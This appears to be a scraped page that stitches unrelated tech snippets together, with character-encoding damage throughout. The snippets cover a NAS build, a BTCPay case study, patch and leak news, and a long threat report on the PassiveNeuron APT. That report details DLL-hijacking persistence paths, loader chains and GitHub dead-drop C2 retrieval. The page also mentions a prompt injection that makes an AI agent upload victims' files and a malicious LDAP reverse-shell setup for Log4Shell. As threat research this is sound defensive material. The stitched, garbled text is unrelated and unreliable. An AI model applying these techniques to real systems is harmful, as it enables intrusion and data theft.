Self-hosting a few services on oneβs own hardware is a great way to wrest some control over your online presence while learning a lot about computers, software, and networking. A common entry point is using an old computer or Raspberry Pi to get something like a small NAS, DNS-level adblocker, or home automation service online, but the hobby can quickly snowball to server-grade hardware in huge racks. [Dennis] is well beyond this point, with a rack-mounted NAS already up and running. This build expands his existing NAS to one which can host a petabyte of storage out of consumer-grade components.
The main reason for building this without relying too much on server-grade gear is that servers are generally designed to run in their own purpose-built rooms away from humans, and as a result donβt generally take much consideration for how loud that environment becomes. [Dennis] is building a lot of the components from scratch for this build including the case, the backplanes for the drives, and a backplane tester. With backplanes installed itβs time to hook up all of the data connections thanks to a few SAS expanders which provide all of the SATA connections for the 45 drives.
There are two power supplies here as well, although unlike a server solution these arenβt redundant and each only serves half the drives. This does keep it running quieter, along with a series of Noctua fans that cool the rest of the rack. The build finishes off with an LED strip which provides a quick visual status check for each of the drives in the bay. With that itβs ready for drives and to be connected to the network. Itβs a ton of wiring and soldering, and great if you donβt want to use noisy server hardware. And, if you donβt need this much space or power, weβve seen some NAS builds that are a bit on the smaller side as well.
PromptArmor threat researchers uncovered a vulnerability in Anthropic's new Cowork that already was detected in the AI company's Claude Code developer tool, and which allows a threat actor to trick the agent into uploading a victim's sensitive files to their own Anthropic account.
Overview On January 14, NSFOCUS CERT detected that Microsoft released the January Security Update patch, which fixed 112 security issues involving widely used products such as Windows, Microsoft Office, Microsoft SQL Server, Azure, etc., including high-risk vulnerability types such as privilege escalation and remote code execution. Among the vulnerabilities fixed by Microsoftβs monthly update this [β¦]
BTC Inc, the parent company of Bitcoin Magazine and the organizer of major global Bitcoin conferences, has spent the past several years restructuring its internal operations around Bitcoin-native infrastructure, relying heavily on the open-source BTCPay Server to manage its payments, payroll, and treasury functions.
The effort reflects a broader push by the company to operate on what it describes as a βBitcoin standard,β using bitcoin not only as a reserve asset but as a primary medium for internal and external transactions.Β
Executives and engineers involved in the project say the goal was to eliminate dependence on custodial payment processors, reduce cross-border settlement friction, and create a unified system capable of handling live commerce at speed and scale.
BTCPay Server, a self-hosted and non-custodial Bitcoin payments platform, emerged as the core infrastructure after BTC Inc evaluated multiple third-party payment solutions.Β
According to the company, custodial processors introduced counterparty risk and regulatory constraints, while off-the-shelf systems lacked the flexibility needed for global events and payroll coordination.
Conference payments as the first test case
BTC Inc first deployed BTCPay Server at its flagship conferences, where the need for high-throughput, real-time payments was most acute. Events regularly host tens of thousands of attendees and dozens of vendors, often in environments with constrained connectivity and strict operational timelines.
Using BTCPayβs web-based point-of-sale system, vendors were able to accept on-chain and Lightning payments directly to their own wallets. BTC Inc also used BTCPayβs βmark as paidβ functionality to record cash and card transactions alongside bitcoin payments, allowing vendors to reconcile all sales through a single interface.
The system was rolled out across four major events between 2024 and 2025, beginning with Bitcoin Asia in Hong Kong and expanding through conferences in Nashville, Abu Dhabi, and Las Vegas.Β
Each event served as an iteration point, with the operations team refining vendor onboarding, payment flows, and reporting tools.
Record-setting deployment in Las Vegas
The largest deployment took place at The Bitcoin Conference 2025 in Las Vegas, where BTC Inc integrated BTCPay Server with Lightning-enabled NFC Bolt Cards and optimized point-of-sale infrastructure across the venue.Β
On May 28, 2025, the event set a Guinness World Record for the most cryptocurrency point-of-sale transactions completed in eight hours, recording 4,187 transactions.
BTCPay-powered terminals operated alongside traditional Square point-of-sale systems, which had recently added Bitcoin payment support. BTC Inc said the side-by-side deployment demonstrated that Bitcoin-native payment systems could function at the same scale and speed as established fiat infrastructure in high-traffic commercial environments.
Across all conferences, BTC Inc reports more than 5,600 in-person Bitcoin transactions, totaling approximately 2.09 BTC in volume.
Expanding into BTC Inc payroll and vendor payments
Following the conference deployments, BTC Inc extended BTCPay Server into internal finance operations. The company adopted BTCPayβs VendorPay plugin to manage outbound payments to contractors, partners, and employees, many of whom are distributed across multiple jurisdictions.
VendorPay allows payments to be batched, scheduled, and tracked, reducing transaction fees and eliminating delays associated with international bank transfers.Β
BTC Inc says it has processed more than $1 million in Bitcoin payouts using the system, without relying on intermediaries or custodial services.
As payment volume increased, the company implemented BTCPayβs native multisignature wallet support to add shared approval controls to treasury management. Transactions now require multiple signatures, with hardware wallets integrated through BTCPay Vault, allowing the company to maintain self-custody while distributing authorization across team members.
Automating Bitcoin accumulation
BTC Inc developed a BTCPay Server plugin known internally as βBitcoin Stackerβ to automatically convert a portion of fiat revenue into bitcoin. The system routes a percentage of Stripe credit card receipts into bitcoin purchases, creating a rules-based dollar-cost averaging process.
Since launching the program in January 2025, BTC Inc says it has accumulated more than 6.5 BTC through automated conversions. The company describes the approach as a conservative treasury policy rather than a speculative strategy, designed to build bitcoin-denominated working capital that can be reused for vendor payments and payroll through BTCPay.
BTC Inc says BTCPay Server has become a core operational tool across events, finance, and treasury functions, citing reduced payment friction, faster settlement, and consistent self-custodial workflows.Β
The company also contributed operational feedback that informed improvements to VendorPay and multisignature support.
While aligned with BTC Incβs long-term view on Bitcoin adoption, the company says the shift has been driven primarily by operational efficiency.Β
Cybersecurity researchers discovered an unsecured 16TB database exposing 4.3 billion professional records, including names, emails, and LinkedIn data. Learn what happened, why this massive data leak enables new scams, and how to protect your PII.
How much does IT downtime really cost your organization?
Most executives think it's just an annoying blip on the radar. But if you've ever been on the receiving end of a 3 AM call because the production server went down, you know better. Studies put the number at over $5,000 per minute for large organizations. Per minute. That's the cost of your CEO unable to access email, sales teams locked out of CRM systems, and customers abandoning shopping carts.
Back in 2024, we gave a brief description of a complex cyberespionage campaign that we dubbed βPassiveNeuronβ. This campaign involved compromising the servers of government organizations with previously unknown APT implants, named βNeursiteβ and βNeuralExecutorβ. However, since its discovery, the PassiveNeuron campaign has been shrouded in mystery. For instance, it remained unclear how the implants in question were deployed or what actor was behind them.
After we detected this campaign and prevented its spreading back in June 2024, we did not see any further malware deployments linked to PassiveNeuron for quite a long time, about six months. However, since December 2024, we have observed a new wave of infections related to PassiveNeuron, with the latest ones dating back to August 2025. These infections targeted government, financial and industrial organizations located in Asia, Africa, and Latin America. Since identifying these infections, we have been able to shed light on many previously unknown aspects of this campaign. Thus, we managed to discover details about the initial infection and gather clues on attribution.
While investigating PassiveNeuron infections both in 2024 and 2025, we found that a vast majority of targeted machines were running Windows Server. Specifically, in one particular infection case, we observed attackers gain initial remote command execution capabilities on the compromised server through the Microsoft SQL software. While we do not have clear visibility into how attackers were able to abuse the SQL software, it is worth noting that SQL servers typically get compromised through:
Exploitation of vulnerabilities in the server software itself
Exploitation of SQL injection vulnerabilities present in the applications running on the server
Getting access to the database administration account (e.g. by brute-forcing the password) and using it to execute malicious SQL queries
After obtaining the code execution capabilities with the help of the SQL software, attackers deployed an ASPX web shell for basic malicious command execution on the compromised machine. However, at this stage, things did not go as planned for the adversary. The Kaspersky solution installed on the machine was preventing the web shell deployment efforts, and the process of installing the web shell ended up being quite noisy.
In attempts to evade detection of the web shell, attackers performed its installation in the following manner:
They dropped a file containing the Base64-encoded web shell on the system.
They dropped a PowerShell script responsible for Base64-decoding the web shell file.
They launched the PowerShell script in an attempt to write the decoded web shell payload to the filesystem.
As Kaspersky solutions were preventing the web shell installation, we observed attackers to repeat the steps above several times with minor adjustments, such as:
Using hexadecimal encoding of the web shell instead of Base64
Using a VBS script instead of a PowerShell script to perform decoding
Writing the script contents in a line-by-line manner
Having failed to deploy the web shell, attackers decided to use more advanced malicious implants to continue the compromise process.
Malicious implants
Over the last two years, we have observed three implants used over the course of PassiveNeuron infections, which are:
Neursite, a custom C++ modular backdoor used for cyberespionage activities
NeuralExecutor, a custom .NET implant used for running additional .NET payloads
the Cobalt Strike framework, a commercial tool for red teaming
While we saw different combinations of these implants deployed on targeted machines, we observed that in the vast majority of cases, they were loaded through a chain of DLL loaders. The first-stage loader in the chain is a DLL file placed in the system directory. Some of these DLL file paths are:
C:\Windows\System32\wlbsctrl.dll
C:\Windows\System32\TSMSISrv.dll
C:\Windows\System32\oci.dll
Storing DLLs under these paths has been beneficial to attackers, as placing libraries with these names inside the System32 folder makes it possible to automatically ensure persistence. If present on the file system, these DLLs get automatically loaded on startup (the first two DLLs are loaded into the svchost.exe process, while the latter is loaded into msdtc.exe) due to the employed Phantom DLL Hijacking technique.
It also should be noted that these DLLs are more than 100 MB in size β their size is artificially inflated by attackers by adding junk overlay bytes. Usually, this is done to make malicious implants more difficult to detect by security solutions.
On startup, the first-stage DLLs iterate through a list of installed network adapters, calculating a 32-bit hash of each adapterβs MAC address. If neither of the MAC addresses is equal to the value specified in the loader configuration, the loader exits. This MAC address check is designed to ensure that the DLLs get solely launched on the intended victim machine, in order to hinder execution in a sandbox environment. Such detailed narrowing down of victims implies the adversaryβs interest towards specific organizations and once again underscores the targeted nature of this threat.
Having checked that it is operating on a target machine, the loader continues execution by loading a second-stage loader DLL that is stored on disk. The paths where the second-stage DLLs were stored as well as their names (examples include elscorewmyc.dll and wellgwlserejzuai.dll) differed between machines. We observed the second-stage DLLs to also have an artificially inflated file size (in excess of 60 MB), and the malicious goal was to open a text file containing a Base64-encoded and AES-encrypted third-stage loader, and subsequently launch it.
Snippet of the payload file contents
This payload is a DLL as well, responsible for launching a fourth-stage shellcode loader inside another process (e.g. WmiPrvSE.exe or msiexec.exe) which is created in suspended mode. In turn, this shellcode loads the final payload: a PE file converted to a custom executable format.
In summary, the process of loading the final payload can be represented with the following graph:
Final payload loading
It is also notable that attackers attempted to use slightly different variants of the loading scheme for some of the target organizations. For example, we have seen cases without payload injection into another process, or with DLL obfuscation on disk with VMProtect.
The Neursite backdoor
Among the three final payload implants that we mentioned above, the Neursite backdoor is the most potent one. We dubbed it so because we observed the following source code path inside the discovered samples: E:\pro\code\Neursite\client_server\nonspec\mbedtls\library\ssl_srv.c. The configuration of this implant contains the following parameters:
List of C2 servers and their ports
List of HTTP proxies that can be used to connect to C2 servers
List of HTTP headers used while connecting to HTTP-based C2 servers
A relative URL used while communicating with HTTP-based C2 servers
A range of wait time between two consecutive C2 server connections
A byte array of hours and days of the week when the backdoor is operable
An optional port that should be opened for listening to incoming connections
The Neursite implant can use the TCP, SSL, HTTP and HTTPS protocols for C2 communications. As follows from the configuration, Neursite can connect to the C2 server directly or wait for another machine to start communicating through a specified port. In cases we observed, Neursite samples were configured to use either external servers or compromised internal infrastructure for C2 communications.
The default range of commands implemented inside this backdoor allows attackers to:
Retrieve system information.
Manage running processes.
Proxy traffic through other machines infected with the Neursite implant, in order to facilitate lateral movement.
Additionally, this implant is equipped with a component that allows loading supplementary plugins. We observed attackers deploy plugins with the following capabilities:
Shell command execution
File system management
TCP socket operations
The NeuralExecutor loader
NeuralExecutor is another custom implant deployed over the course of the PassiveNeuron campaign. This implant is .NET based, and we found that it employed the open-source ConfuserEx obfuscator for protection against analysis. It implements multiple methods of network communication, namely TCP, HTTP/HTTPS, named pipes, and WebSockets. Upon establishing a communication channel with the C2 server, the backdoor can receive commands allowing it to load .NET assemblies. As such, the main capability of this backdoor is to receive additional .NET payloads from the network and execute them.
Tricky attribution
Both Neursite and NeuralExecutor, the two custom implants we found to be used in the PassiveNeuron campaign, have never been observed in any previous cyberattacks. We had to look for clues that could hint at the threat actor behind PassiveNeuron.
Back when we started investigating PassiveNeuron back in 2024, we spotted one such blatantly obvious clue:
Function names found inside NeuralExecutor
In the code of the NeuralExecutor samples we observed in 2024, the names of all functions had been replaced with strings prefixed with βΠ‘ΡΠΏΠ΅Ρ ΠΎΠ±ΡΡΡΠΊΠ°ΡΠΎΡβ, the Russian for βSuper obfuscatorβ. It is important to note, however, that this string was deliberately introduced by the attackers while using the ConfuserEx obfuscator. When it comes to strings that are inserted into malware on purpose, they should be assessed carefully during attribution. That is because threat actors may insert strings in languages they do not speak, in order to create false flags intended to confuse researchers and incident responders and prompt them to make an error of judgement when trying to attribute the threat. For that reason, we attached little evidential weight to the presence of the βΠ‘ΡΠΏΠ΅Ρ ΠΎΠ±ΡΡΡΠΊΠ°ΡΠΎΡβ string back in 2024.
After examining the NeuralExecutor samples used in 2025, we found that the Russian-language string had disappeared. However, this year we noticed another peculiar clue related to this implant. While the 2024 samples were designed to retrieve the C2 server addresses straight from the configuration, the 2025 ones did so by using the Dead Drop Resolver technique. Specifically, the new NeuralExecutor samples that we found were designed to retrieve the contents of a file stored in a GitHub repository, and extract a string from it:
Contents of the configuration file stored on GitHub
The malware locates this string by searching for two delimiters, wtyyvZQY and stU7BU0R, that mark the start and the end of the configuration data. The bytes of this string are then Base64-decoded and decrypted with AES to obtain the C2 server address.
Snippet of the implant configuration
It is notable that this exact method of obtaining C2 server addresses from GitHub, using a string containing delimiter sequences, is quite popular among Chinese-speaking threat actors. For instance, we frequently observed it being used in the EastWind campaign, which we previously connected to the APT31 and APT27 Chinese-speaking threat actors.
Furthermore, during our investigation, we learned one more interesting fact that could be useful in attribution. We observed numerous attempts to deploy the PassiveNeuron loader in one particular organization. After discovering yet another failed deployment, we have detected a malicious DLL named imjp14k.dll. An analysis of this DLL revealed that it had the PDB path G:\Bee\Tree(pmrc)\Src\Dll_3F_imjp14k\Release\Dll.pdb. This PDB string was referenced in a report by Cisco Talos on activities likely associated with the threat actor APT41. Moreover, we identified that the discovered DLL exhibits the same malicious behavior as described in the Cisco Talos report. However, it remains unclear why this DLL was uploaded to the target machine. Possible explanations could be that the attackers deployed it as a replacement for the PassiveNeuron-related implants, or that it was used by another actor who compromised the organization simultaneously with the attackers behind PassiveNeuron.
When dealing with attribution of cyberattacks that are known to involve false flags, it is difficult to understand which attribution indicators to trust, or whether to trust any at all. However, the overall TTPs of the PassiveNeuron campaign most resemble the ones commonly employed by Chinese-speaking threat actors. Since TTPs are usually harder to fake than indicators like strings, we are, as of now, attributing the PassiveNeuron campaign to a Chinese-speaking threat actor, albeit with a low level of confidence.
Conclusion
The PassiveNeuron campaign has been distinctive in the way that it primarily targets server machines. These servers, especially the ones exposed to the internet, are usually lucrative targets for APTs, as they can serve as entry points into target organizations. It is thus crucial to pay close attention to the protection of server machines. Wherever possible, the attack surface associated with these servers should be reduced to a minimum, and all server applications should be monitored to prevent emerging infections in a timely manner. Specific attention should be paid to protecting applications against SQL injections, which are commonly exploited by threat actors to obtain initial access. Another thing to focus on is protection against web shells, which are deployed to facilitate compromise of servers.
Boys and girls today I would like to quickly share with you in a nutshell an interesting offer for good quality and affordable VPS servers. There comes a time in the life of every IT guy, whether home-grown, amateur or professional, to do a bit of admin stuff. Set something up from start to finish. You can do it in the comfort of your home, or
Another strange thing I decided to do with 0ut3r.space was to serve it via Gemini, I mean not the full copy, but a frontage only (full copy maybe if there will be someone who wants to read it in the Gemini world). As always, I wanted to learn something new while discovering something new. Also, only real hackers serve content over Gemini (lol),
It is very important to have a development or test environment for whatever you are working on. It does not matter if it is your home made project, your personal website, your school project or your work stuff. You should always follow good practice and have a test environment (with backup) for all changes and experiments before going into
Remote connection for Windows is pretty easy. Built in RDP server and client allows you to connect to remote Windows machine without any additional software. It is of course not too safe, to allow remote connection from the Internet, without any additional security layer, but this is not the topic for today. Today we are talking about local
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
Login
